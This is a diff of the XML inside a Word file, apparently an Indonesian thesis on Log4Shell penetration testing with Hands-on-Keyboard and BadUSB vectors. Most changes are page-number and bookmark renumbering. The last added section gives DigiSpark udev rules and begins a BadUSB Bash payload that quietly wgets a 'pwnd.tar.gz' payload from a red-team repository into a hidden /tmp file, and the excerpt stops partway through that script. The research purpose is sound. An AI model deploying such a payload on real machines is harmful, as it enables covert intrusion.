               </w:rPr>
-              <w:t>40</w:t>
+              <w:t>43</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7038,7 +7043,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>40</w:t>
+              <w:t>43</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7145,7 +7150,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>40</w:t>
+              <w:t>43</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7252,7 +7257,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>40</w:t>
+              <w:t>43</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7359,7 +7364,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>41</w:t>
+              <w:t>43</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7466,7 +7471,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>41</w:t>
+              <w:t>43</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7572,7 +7577,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>41</w:t>
+              <w:t>43</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7668,7 +7673,7 @@
               <w:rPr>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>42</w:t>
+              <w:t>44</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7760,7 +7765,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>42</w:t>
+              <w:t>44</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7853,7 +7858,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>42</w:t>
+              <w:t>44</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7926,7 +7931,7 @@
               <w:rPr>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>43</w:t>
+              <w:t>45</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10598,6 +10603,26 @@
       <w:r>
         <w:t>AT</w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dengan vektor serangan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Hands-on-Keyboard</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>BadUSB</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10612,69 +10637,13 @@
         <w:t xml:space="preserve">Menganalisis </w:t>
       </w:r>
       <w:r>
-        <w:t>implementasi</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> pengujian </w:t>
-      </w:r>
-      <w:r>
-        <w:t>serta</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mitigasinya </w:t>
-      </w:r>
-      <w:r>
-        <w:t>pada</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> penggunaan </w:t>
-      </w:r>
-      <w:r>
-        <w:t>vektor serangan</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>Hands-on-Keyboard</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> dan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>BadUSB</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> dengan metode PTES dalam lingkup </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>white</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>box testing</w:t>
+        <w:t>signifikansi perubahan dari</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> kondisi sumber daya sistem target terhadap eksploitasi dan mitigasin</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> yang diberikan</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26635,6 +26604,7 @@
                 <w:szCs w:val="28"/>
               </w:rPr>
             </w:pPr>
+            <w:bookmarkStart w:id="100" w:name="_Hlk118953146"/>
             <w:r>
               <w:rPr>
                 <w:sz w:val="24"/>
@@ -26725,6 +26695,7 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:bookmarkEnd w:id="100"/>
       <w:tr>
         <w:tc>
           <w:tcPr>
@@ -28092,7 +28063,7 @@
         </w:numPr>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="100" w:name="_Toc117497876"/>
+      <w:bookmarkStart w:id="101" w:name="_Toc117497876"/>
       <w:r>
         <w:t>4.1.2</w:t>
       </w:r>
@@ -28102,7 +28073,7 @@
       <w:r>
         <w:t>Desain Skema LDAP</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="100"/>
+      <w:bookmarkEnd w:id="101"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -29397,7 +29368,7 @@
         <w:pStyle w:val="H2"/>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="101" w:name="_Toc117497877"/>
+      <w:bookmarkStart w:id="102" w:name="_Toc117497877"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>4.2</w:t>
@@ -29406,7 +29377,7 @@
         <w:tab/>
         <w:t>Implementasi Sistem</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="101"/>
+      <w:bookmarkEnd w:id="102"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -29480,7 +29451,7 @@
         </w:numPr>
         <w:spacing w:before="0" w:after="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="102" w:name="_Toc117497878"/>
+      <w:bookmarkStart w:id="103" w:name="_Toc117497878"/>
       <w:r>
         <w:t>4.2.1</w:t>
       </w:r>
@@ -29488,7 +29459,7 @@
         <w:tab/>
         <w:t>Implementasi Sistem Pengguna</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="102"/>
+      <w:bookmarkEnd w:id="103"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -29818,7 +29789,7 @@
         <w:pStyle w:val="Body"/>
         <w:spacing w:after="240"/>
       </w:pPr>
-      <w:bookmarkStart w:id="103" w:name="_Toc117497879"/>
+      <w:bookmarkStart w:id="104" w:name="_Toc117497879"/>
       <w:r>
         <w:rPr>
           <w:color w:val="00B050"/>
@@ -32035,13 +32006,13 @@
       <w:r>
         <w:t>Implementasi Sistem Penyerang</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="103"/>
+      <w:bookmarkEnd w:id="104"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="H4"/>
       </w:pPr>
-      <w:bookmarkStart w:id="104" w:name="_Toc117497880"/>
+      <w:bookmarkStart w:id="105" w:name="_Toc117497880"/>
       <w:r>
         <w:t>4.2.2.1</w:t>
       </w:r>
@@ -32049,7 +32020,7 @@
         <w:tab/>
         <w:t>Instalasi dan Konfigurasi Layanan OpenLDAP</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="104"/>
+      <w:bookmarkEnd w:id="105"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -33379,7 +33350,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="105" w:name="_Toc117497881"/>
+      <w:bookmarkStart w:id="106" w:name="_Toc117497881"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
@@ -33799,7 +33770,7 @@
       <w:r>
         <w:t>Instalasi dan Konfigurasi Layanan Apache HTTP Server</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="105"/>
+      <w:bookmarkEnd w:id="106"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -34589,7 +34560,7 @@
       <w:pPr>
         <w:pStyle w:val="H4"/>
       </w:pPr>
-      <w:bookmarkStart w:id="106" w:name="_Toc117497882"/>
+      <w:bookmarkStart w:id="107" w:name="_Toc117497882"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>4.2.2.</w:t>
@@ -34603,7 +34574,7 @@
       <w:r>
         <w:t>Pengembangan Aplikasi Layanan HTTP Go</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="106"/>
+      <w:bookmarkEnd w:id="107"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35077,7 +35048,7 @@
         <w:pStyle w:val="Body"/>
         <w:spacing w:after="240"/>
       </w:pPr>
-      <w:bookmarkStart w:id="107" w:name="_Toc117497883"/>
+      <w:bookmarkStart w:id="108" w:name="_Toc117497883"/>
       <w:r>
         <w:rPr>
           <w:color w:val="00B050"/>
@@ -36757,7 +36728,7 @@
       <w:r>
         <w:t>Pengembangan Aplikasi Layanan HTTP Java</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="107"/>
+      <w:bookmarkEnd w:id="108"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38315,7 +38286,22 @@
         <w:t xml:space="preserve">Pada </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">implementasinya, layanan didukung dengan skrip Bash untuk terus mencari nomor porta yang tersedia di dalam sistem target apabila terblokir. </w:t>
+        <w:t xml:space="preserve">implementasinya, layanan didukung dengan skrip Bash untuk terus mencari nomor porta yang tersedia di dalam sistem target apabila </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">nomor porta </w:t>
+      </w:r>
+      <w:r>
+        <w:t>terblokir</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, atau proses dari layanan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>dihentikan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -38324,7 +38310,13 @@
         <w:t xml:space="preserve">Rentang </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">nomor porta yang digunakan adalah bentuk dinamis, yaitu 49152 – 65535. </w:t>
+        <w:t xml:space="preserve">nomor porta yang digunakan adalah bentuk dinamis, yaitu </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dari </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">49152 – 65535. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -38573,8 +38565,9 @@
       <w:pPr>
         <w:pStyle w:val="H4"/>
       </w:pPr>
-      <w:bookmarkStart w:id="108" w:name="_Toc117497884"/>
-      <w:r>
+      <w:bookmarkStart w:id="109" w:name="_Toc117497884"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>4.2.2.5</w:t>
       </w:r>
       <w:r>
@@ -38583,7 +38576,7 @@
       <w:r>
         <w:t>Pengembangan Payload Java</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="108"/>
+      <w:bookmarkEnd w:id="109"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -38676,11 +38669,7 @@
         <w:t>framework</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">JNDI yang </w:t>
+        <w:t xml:space="preserve"> JNDI yang </w:t>
       </w:r>
       <w:r>
         <w:t>digunakan</w:t>
@@ -38948,6 +38937,7 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="110" w:name="_Hlk118977535"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
@@ -38999,6 +38989,7 @@
         <w:t xml:space="preserve"> {</w:t>
       </w:r>
     </w:p>
+    <w:bookmarkEnd w:id="110"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
@@ -39757,8 +39748,9 @@
       <w:pPr>
         <w:pStyle w:val="H4"/>
       </w:pPr>
-      <w:bookmarkStart w:id="109" w:name="_Toc117497885"/>
-      <w:r>
+      <w:bookmarkStart w:id="111" w:name="_Toc117497885"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>4.2.2.5</w:t>
       </w:r>
       <w:r>
@@ -39773,59 +39765,1080 @@
       <w:r>
         <w:t>BadUSB</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="109"/>
+      <w:bookmarkEnd w:id="111"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Konfigurasi pada perangkat BadUSB diawali dengan</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> [ update konfigurasi boot loader + jelasin boot loader ]</w:t>
+        <w:spacing w:after="240"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>Pengembangan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pada perangkat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>BadUSB</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> diawali dengan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>me</w:t>
+      </w:r>
+      <w:r>
+        <w:t>registrasi perangkat</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ke dalam sistem melalui manajemen perangkat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Udev</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Layanan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tersebut digunakan untuk membuat suatu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>node</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>relasi</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">secara dinamis </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pada perangkat DigiSpark ke dalam sistem, sehingga </w:t>
+      </w:r>
+      <w:r>
+        <w:t>antar muka</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>atribut</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> perangkat dapat dikenali untuk kemudian dilakukan pemrograman di dalamnya.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Berikut </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">adalah </w:t>
+      </w:r>
+      <w:r>
+        <w:t>implementasi</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">konfigurasinya </w:t>
+      </w:r>
+      <w:r>
+        <w:t>beserta</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> hak akses </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>read</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>write</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> untuk pengguna pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>laptop</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> A</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-      </w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nano </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/etc/udev/rules.d/49-micronucleus.rules</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>SUBSYSTEMS=="usb",ATTRS{idVendor}=="16d0",ATTRS{idProduct}=="0753", MODE:="0666"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>KERNEL=="ttyACM*",ATTRS{idVendor}=="16d0",ATTRS{idProduct}=="0753", MODE:="0666", ENV{ID_MM_DEVICE_IGNORE}="1"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sudo udevadm control --reload-rules</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="240"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>Dalam</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>memprogram perangkat untuk melakukan eksploitasi,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> rangkaian perintah yang </w:t>
+      </w:r>
+      <w:r>
+        <w:t>dikembangkan dalam skrip Bash kemudian</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dikemas </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ke </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dalam </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">bentuk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>encoding</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>base64</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> terlebih dahulu</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hal </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ini ditunjukkan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>agar</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> seluruh rangkaian </w:t>
+      </w:r>
+      <w:r>
+        <w:t>tersebut</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dapat </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dijalankan dalam </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">format yang kompatibel dan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>sederhana</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tanpa </w:t>
+      </w:r>
+      <w:r>
+        <w:t>menghilangkan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> kapabilitas</w:t>
+      </w:r>
+      <w:r>
+        <w:t>nya</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dalam </w:t>
+      </w:r>
+      <w:r>
+        <w:t>pengujian</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Berikut </w:t>
+      </w:r>
+      <w:r>
+        <w:t>merupakan skrip Bash yang kem</w:t>
+      </w:r>
+      <w:r>
+        <w:t>u</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dian dilakukan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>encoding</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">untuk disimpan ke dalam berkas </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>digispark.b64</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>nano digispark.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#!/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>wget -q -O /tmp/.a https://github.com/hotpotcookie/log4shell-wh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ite-box/raw/main/red/payload/pwnd.tar.gz &amp; wait</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
